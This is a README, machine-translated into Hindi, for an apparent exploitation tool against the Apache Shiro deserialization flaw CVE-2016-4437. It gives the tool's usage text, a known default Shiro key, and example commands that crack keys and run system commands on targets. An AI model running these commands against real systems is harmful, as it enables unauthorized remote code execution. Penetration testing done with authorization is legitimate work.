
शिरो डिसीरियलाइजेशन भेद्यता (CVE-2016-4437) के लिए एक तेज़ उपयोग उपकरण/ysoserial के साथ शिरो फ्रेमवर्क हमलों के लिए एक सरल उपकरण।
शिरो डिसीरियलाइज़ेशन भेद्यता (CVE-2016-4437) के लिए एक त्वरित शोषण उपकरण
4nth0ny @ शुक्रवार प्रयोगशाला
issues/pr का स्वागत है
:)
python 3.x
JDK 1.8
python3 -m pip install -r requirements.txt
के लिए AttributeError: module 'Crypto.Cipher.AES' has no attribute 'MODE_GCM' या No module named 'Crypto'
python3 -m pip uninstall crypto pycryptodome
python3 -m pip install pycryptodome
usage: shisoserial.py [-h] --mode MODE --url [--type default:CBC] [--data] [--key] [--gadget] [--command default:whoami] [--proxies] [--ser] [--thread]
This is a simple tool to attack framework shiro with ysoserial
optional arguments:
-h, --help show this help message and exit
--mode MODE, -m MODE check/crack/yso/echo/encode
--url , -u Target URL address or the file containing the target URL
--type default:CBC, -t default:CBC
Cipher Type, GCM or CBC
--data , -d Using this parameter will make HTTP request with POST method
--key , -k Specify a Shiro Key or will use dictionary brute force cracking
--gadget , -g Specific Ysoserial Gadget
--command default:whoami, -c default:whoami
Specific Execute Command
--proxies , -p Specific Proxy
--ser , -s Specific serialize file name
--thread , -T Specific the number of threads
python3 shisoserial.py -m check -u http://127.0.0.1:8080

python3 shisoserial.py -m crack -u http://*.*.*.*:**** -t CBC -p ****://*.*.*.*:****/

python3 shisoserial.py -m echo -u http://127.0.0.1:8080 -g CommonsCollectionsK1 -c id

python3 shisoserial.py -m crack -u target_urls.txt -k kPH+bIxk5D2deZiIxcaaaA== -d username=1

python3 shisoserial.py -m encode -u target_urls.txt -t cbc -s 1.ser -T 4

यह उपकरण केवल पर्याप्त कानूनी प्राधिकरण वाले उद्यम सुरक्षा निर्माण में उपयोग किया जा सकता है। इस उपकरण का उपयोग करते समय, आपको यह सुनिश्चित करना होगा कि आपके सभी कार्य स्थानीय कानूनों और विनियमों का अनुपालन करते हैं। यदि आप इस उपकरण का उपयोग करते समय कोई अवैध कार्य करते हैं, तो आप सभी परिणामों के लिए स्वयं जिम्मेदार होंगे, और इस उपकरण के सभी डेवलपर्स और सभी योगदानकर्ता किसी भी कानूनी या संयुक्त देयता को स्वीकार नहीं करते हैं। जब तक आपने इस समझौते के सभी नियमों को पूरी तरह से पढ़, समझ और स्वीकार नहीं कर लिया है, तब तक कृपया इस उपकरण को स्थापित और उपयोग न करें। आपके उपयोग का कार्य या इस समझौते को स्पष्ट या मौन रूप से स्वीकार करने का कोई अन्य तरीका माना जाएगा कि आपने इस समझौते को पढ़ लिया है और इसके बंधनों से सहमत हैं।